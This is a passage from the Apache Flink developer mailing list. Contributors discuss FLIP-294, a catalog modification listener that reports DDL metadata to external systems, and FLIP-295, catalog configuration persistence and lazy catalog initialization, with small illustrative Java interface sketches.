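(the shape below is only a guess for illustration, not the FLIP's final
definition):

    public interface AlterDatabaseEvent extends CatalogModificationEvent {
        String databaseName();
        CatalogDatabase originDatabase(); // state before the ALTER, enables diffing
        CatalogDatabase newDatabase();    // state after the ALTER
    }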

Best regards,
Yuxia

----- Original Message -----
From: "ron9 liu"
To: "dev"
Sent: Wednesday, May 31, 2023, 11:36:04 AM
Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

Hi, Shammon

Thanks for driving this FLIP. It will enhance Flink's metadata capability
from the platform producer's perspective. The overall design looks good to me,
I just have some small questions:
1. Regarding the CatalogModificationListenerFactory#createListener method, I
think it would be better to pass a Context as its parameter instead of two
specific Objects. In this way, we can easily extend it in the future and
there will be no compatibility problems. Refer to
https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
2. In FLIP, you mentioned that multiple Flink tables may refer to the same
physical table, so does the Listener report this physical table repeatedly?
3. When registering a Listener object, will it connect to an external
system such as Datahub? If the Listener object registration times out due
to permission issues, it will affect the execution of all subsequent SQL;
what should we do in this case?

Best,
Ron

Shammon FY wrote on Wed, May 31, 2023 at 08:53:

> Thanks Feng, the catalog modification listener is only used to report
> read-only DDL information to other components or systems.
>
> > 1. Will an exception thrown by the listener affect the normal execution
> process?
>
> Users need to handle the exception in the listener themselves. Many DDLs
> such as drop table and alter table cannot be rolled back, so Flink cannot
> handle these exceptions for the listener. The operation will exit if an
> exception is thrown, but the executed DDL will still have succeeded.
>
> > 2. What is the order of execution? Is the listener executed first or are
> specific operations executed first?  If I want to perform DDL permission
> verification (such as integrating with Ranger based on the listener), is
> that possible?
>
> The listener will be notified to report catalog modification after DDLs are
> successful, so you can not do permission verification for DDL in the
> listener. As mentioned above, Flink will not roll back the DDL even when
> the listener throws an exception. I think permission verification is
> another issue and can be discussed separately.
>
>
> Best,
> Shammon FY
>
> On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
>
> > Hi, Shammon
> >
> > Thanks for driving this FLIP, [Support Customized Job Meta Data Listener]
> > will make it easier for Flink to collect lineage information.
> > I fully agree with the overall solution and have some small questions:
> >
> > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > 2. What is the order of execution? Is the listener executed first or are
> > specific operations executed first?  If I want to perform DDL permission
> > verification (such as integrating with Ranger based on the listener), is
> > that possible?
> >
> >
> > Best,
> > Feng
> >
> > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> >
> > > Hi devs,
> > >
> > > We would like to bring up a discussion about FLIP-294: Support
> Customized
> > > Job Meta Data Listener[1]. We have had several discussions with Jark
> Wu,
> > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> and
> > > interfaces, and thanks for their valuable advice.
> > > The overall job and connector information is divided into metadata and
> > > lineage; this FLIP focuses on metadata, and lineage will be discussed in
> > > another FLIP in the future. In this FLIP we want to add a customized
> > > listener in Flink to report catalog modifications to external metadata
> > > systems such as datahub[2] or atlas[3]. Users can view the specific
> > > information of connectors such as source and sink for Flink jobs in
> these
> > > systems, including fields, watermarks, partitions, etc.
> > >
> > > Looking forward to hearing from you, thanks.
> > >
> > >
> > > [1]
> > >
> > >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-294%3A+Support+Customized+Job+Meta+Data+Listener
> > > [2] https://datahub.io/
> > > [3] https://atlas.apache.org/#/
> > >
> >
>


Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration and asynchronous registration

2023-05-31 Thread liu ron
Hi, Feng

Thanks for driving this FLIP; this proposal is very useful for catalog
management.
I have some small questions:

1. Regarding the CatalogStoreFactory#createCatalogStore method, do we need
to provide a default implementation (see the sketch below for what I have in
mind)?
2. If we get a Catalog from the CatalogStore, after initializing it, do we
put it into Map<String, Catalog> catalogs again?
3. Regarding the options `sql.catalog.store.type` and
`sql.catalog.store.file.path`, how about renaming them to
`catalog.store.type` and `catalog.store.path`?
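
To make question 1 concrete, this is the kind of default implementation I have
in mind (the interface shapes follow my reading of the FLIP and are not
settled API):

    import java.util.Map;
    import java.util.concurrent.ConcurrentHashMap;

    interface CatalogStoreFactory {
        CatalogStore createCatalogStore();
    }

    // A possible built-in default that keeps descriptors in memory only.
    class InMemoryCatalogStore implements CatalogStore {

        private final Map<String, CatalogDescriptor> store = new ConcurrentHashMap<>();

        @Override
        public void storeCatalog(String catalogName, CatalogDescriptor descriptor) {
            store.put(catalogName, descriptor);
        }

        @Override
        public CatalogDescriptor getCatalog(String catalogName) {
            return store.get(catalogName);
        }
    }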

Best,
Ron

Feng Jin wrote on Mon, May 29, 2023 at 21:19:

> Hi yuxia
>
>  > But from the code in Proposed Changes, once we register the Catalog, we
> initialize it and open it. right?
>
> Yes, in order to avoid inconsistent semantics of the original CREATE
> CATALOG DDL, Catalog will be directly initialized in registerCatalog so
> that parameter validation can be performed.
>
> In the current design, lazy initialization is mainly reflected in
> getCatalog. If the CatalogStore has already saved some catalog
> configurations, initialization only happens in getCatalog, as sketched below.
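
Roughly, the two paths would look like this (pseudocode over the FLIP's
interfaces; initCatalogFromDescriptor, catalogStore, and catalogs are
hypothetical members, not actual CatalogManager code):

    // Eager path: CREATE CATALOG validates by initializing immediately.
    public void createCatalog(String name, CatalogDescriptor descriptor) {
        Catalog catalog = initCatalogFromDescriptor(name, descriptor); // validates options
        catalog.open();
        catalogStore.storeCatalog(name, descriptor);
        catalogs.put(name, catalog);
    }

    // Lazy path: a catalog that only exists in the CatalogStore is
    // initialized the first time somebody asks for it.
    public Catalog getCatalog(String name) {
        return catalogs.computeIfAbsent(name, n -> {
            Catalog catalog = initCatalogFromDescriptor(n, catalogStore.getCatalog(n));
            catalog.open();
            return catalog;
        });
    }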
>
>
> Best,
> Feng
>
> On Mon, May 29, 2023 at 8:27 PM yuxia  wrote:
>
> > Hi, Feng.
> > I'm trying to understanding the meaning of *lazy initialization*. If i'm
> > wrong, please correct me.
> >
> > IIUC, lazy initialization means a catalog is initialized only when you
> > need to access it. But from the code in Proposed Changes, once we
> register
> > the Catalog,
> > we initialize it and open it. right?
> >
> > Best regards,
> > Yuxia
> >
> > ----- Original Message -----
> > From: "Jing Ge"
> > To: "dev"
> > Sent: Monday, May 29, 2023, 5:12:46 PM
> > Subject: Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration
> > and asynchronous registration
> >
> > Hi Feng,
> >
> > Thanks for your effort! +1 for the proposal.
> >
> > One of the major changes is that the current design will provide
> > Map<String, Catalog> catalogs as a snapshot instead of a cache, which
> means
> > once it has been initialized, any changes done by other sessions will not
> > affect it. Point 6 describes follow-up options for further improvement.
> >
> > Best regards,
> > Jing
> >
> > On Mon, May 29, 2023 at 5:31 AM Feng Jin  wrote:
> >
> > > Hi all, I would like to update you on the latest progress of the FLIP.
> > >
> > >
> > > Last week, Leonard Xu, HangRuan, Jing Ge, Shammon FY, ShengKai Fang
> and I
> > > had an offline discussion regarding the overall solution for Flink
> > > CatalogStore. We have reached a consensus and I have updated the final
> > > solution in FLIP.
> > >
> > > Next, let me briefly describe the entire design:
> > >
> > > 1. Introduce CatalogDescriptor to store catalog configuration, similar
> > > to TableDescriptor.
> > >
> > > 2. The two key functions of CatalogStore, void storeCatalog(String
> > > catalogName, CatalogDescriptor) and CatalogDescriptor getCatalog(String),
> > > will both use CatalogDescriptor instead of a Catalog instance. This way,
> > > CatalogStore will only be responsible for saving and retrieving catalog
> > > configurations without having to initialize catalogs.
> > >
> > > 3. The default registerCatalog(String catalogName, Catalog catalog)
> > > function in CatalogManager will be marked as deprecated.
> > >
> > > 4. A new function registerCatalog(String catalogName, CatalogDescriptor
> > > catalog) will be added to serve as the default registration function
> > > for catalogs in CatalogManager.
> > >
> > > 5. Map<String, Catalog> catalogs in CatalogManager will remain unchanged
> > > and save initialized catalogs. This means that deletion operations from
> > > one session won't synchronize with other sessions.
> > >
> > > 6. To support multi-session synchronization scenarios for deletions
> > > later on, we should make Map<String, Catalog> catalogs configurable.
> > > There may be three possible situations:
> > >
> > >    a. Default caching of all initialized catalogs.
> > >
> > >    b. Introduction of LRU cache logic which can automatically clear
> > >    long-unused catalogs.
> > >
> > >    c. No caching of any instances; each call to getCatalog creates a
> > >    new instance.
> > >
> > >
> > > This is the document for discussion:
> > >
> > >
> >
> https://docs.google.com/document/d/1HRJNd4_id7i6cUxGnAybmYZIwl5g1SmZCOzGdUz-6lU/edit
> > >
> > > This is the final proposal document:
> > >
> > >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-295%3A+Support+lazy+initialization+of+catalogs+and+persistence+of+catalog+configurations
> > >
> > >
> > > Thank you very much for your attention and suggestions on this FLIP.  A
> > > special thanks to Hang Ruan for his suggestions on the entire design
> and
> > > organizing offline discussions.
> > >
> > > If you have any further suggestions or feedback about this FLIP please
> > feel
> > > free to share.
> > >
> > >
> > > Best,
> > >
> > > Feng
> > >
> > > On Sat, May 6, 2023 at 8:32 PM Jing Ge 
> > wrote:
> > >
> > >